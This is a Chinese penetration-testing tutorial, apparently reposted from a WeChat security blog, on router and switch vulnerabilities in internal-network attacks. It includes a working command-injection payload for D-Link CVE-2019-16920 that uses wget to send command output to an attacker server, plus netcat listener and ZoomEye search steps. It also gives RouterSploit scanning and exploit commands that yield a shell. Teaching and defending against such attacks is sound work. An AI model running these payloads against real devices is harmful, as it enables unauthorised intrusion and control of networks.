【内网渗透】网络设备漏洞

简介：提到网络设备大家应该都不陌生，不论是小型局域网，还是公司办公网等，只要是涉及网络的都会有网络设备的存在。网络设备包括中继器、网桥、路由器、网关、防火墙、交换机等设备，在内网攻击中，我们不仅要对操作系统、数据库等进行攻击，还要对网络设备进行漏洞攻击，在这一节主要介绍路由器、交换机和安全设备的一些常见漏洞，让大家能够掌握更多的内网攻击的攻击面。

1、路由器漏洞

说明：随着信息时代的到来，路由器是内部网络中必不可少的设备。如果路由器存在漏洞，这将大大影响整个网络系统的安全性，同时也对用户的隐私造成极大威胁。

路由器基本都是基于Linux系统的，架构以MIPS和ARM为主，大部分含有Telnet服务，也会有很多基础命令以Busybox的方式实现，如cat、chmod、date、echo、ifconfig、ls、kill等，当然为了方便用户管理调试，现在越来越多的网络设备还会有Web配置界面。

1．路由器常见漏洞

路由器常见的漏洞有很多，下面列举一些在内网攻击中使用的漏洞，通常为命令执行漏洞、拒绝服务漏洞、未授权访问漏洞和自带后门漏洞这四种类型。

1）命令执行漏洞

TP-Link SR20本地网络远程代码执行漏洞、Dir-890l命令执行漏洞、腾达AC15远程代码执行漏洞(CVE-2018-5767)、D-Link DIR-859远程代码执行漏洞（CVE-2019-17621）。

2）拒绝服务漏洞

TP-Link WR886N V7 Inetd Task Dos、Cisco-ASA-拒绝服务漏洞（CVE-2018-0296）。

3）未授权访问漏洞

腾达某型号路由器后台登录认证、电信光猫HG2821T-U未授权导致信息泄露、D-Link多型号路由器存在任意文件下载漏洞、某些型号的Comba和D-Link路由器存在管理员密码泄露漏洞等。

4）自带后门漏洞

思科路由器SYNful Knock后门程序、Belkin SURF路由器后门、Tenda路由器后门等。

路由器漏洞危害：

当然路由器除了可能存在直接影响安全的漏洞外，还可能存在弱口令的问题，如Web管理后台弱口令、23端口弱口令等。攻克路由器后可以做DNS劫持、蠕虫病毒、ARP欺骗、网络拓扑、流量转发、放置后门等操作。

2．路由器典型漏洞演示

现在介绍一下路由器漏洞CVE-2019-16920。2019年9月，Fortinet FortiGuard实验室发现并报告了D-Link产品中存在一个非认证的命令注入漏洞：CVE-2019-16920，该漏洞可造成远程代码执行。受影响的产品有DIR-655、DIR-866L、DIR-652、DHP-1565、DIR-855L、DAP-1533、DIR-862L、DIR-615、DIR-835、DIR-825等。

通过zoomeye搜索引擎查找网上暴露的存在漏洞设备：

DIR-825 +port:"8080"

该漏洞源于一个失败的身份认证检查，当要进入管理页面时，需要执行登录操作：

洞产生的原因是参数“ping_ipaddr”执行命令注入，虽然响应是跳转到登录页面，但操作“ping_test”仍然执行。

先在外网服务器开启端口监听，用于接收目标的回显信息：

nc -lvvp 9980

修改请求包，将请求内容改为以下payload执行查看当前用户命令：

html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://服务器ip:9980/?$(whoami)&=

发送请求包后外网攻击机收到命令执行回显：

当然这个漏洞不只这一种利用方式，还可以让攻击者检索管理员密码，或将自己的后门安装到服务器上等。

3. 路由器渗透工具RouterSploit

工具在kali系统安装：

apt-get install python3-pip

git clone https://www.github.com/threat9/routersploit

cd routersploit

python3 -m pip install -r requirements.txt

python3 rsf.py

搭建流量隧道进入目标内网后使用RouterSploit工具对目标内网路由器进行漏洞扫描：

proxychains python3 rsf.py

//使用自动扫描模块

use scanners/autopwn

对192.168.0.100这个网络设备进行自动扫描：

set target 192.168.0.100

run

扫描出这个设备存在漏洞并推荐使用的漏洞利用模块，但不一定准确也可以自己查找漏洞利用模块：

自己选择使用漏洞利用模块并配置攻击目标：

use exploits/routers/netgear/multi_rce

set target 192.168.0.100

执行 run 命令，攻击成功后返回一个交互式shell界面可以执行命令：

2、交换机漏洞

说明：交换机在企业网中占有重要的地位，通常是整个网络的核心所在，这一地位使它成为黑客入侵和病毒肆虐的重点对象。常用的交换机品牌有华为交换机、H3C交换机、思科交换机、TP-LINK交换机、锐捷交换机、D-Link交换机、NETGEAR交换机、中兴交换机等，下面例举一些交换机漏洞。

（1）命令执行漏洞

Cisco Smart Install远程命令执行漏洞（CVE-2018-0171）、HP 2910al-48G任意命令执行漏洞、信锐WAC命令执行漏洞。

（2）未授权漏洞

Cisco CatOS密码提示未授权远程命令执行漏洞、Cisco Small Business 220 Series Smart Plus Switches未授权访问漏洞。

（3）拒绝服务漏洞

MOXA EDS-405A工业交换机拒绝服务漏洞、H3C S5120V2-SI系列交换机拒绝服务漏洞、H3C S5000PV3-EI系列以太网交换机拒绝服务漏洞。

（4）其他类型漏洞

Huawei OceanStor SNS3096信息泄露漏洞、H3C ACG1000-M交换机存在弱口令漏洞。

交换机漏洞危害：

黑客攻破交换机后，可以进行的攻击有VLAN跳跃攻击、生成树攻击、MAC表洪水攻击、ARP攻击、VTP攻击、挂马、端口镜像、流量污染等。

原文始发于微信公众号（ZackSecurity）：【内网渗透】网络设备漏洞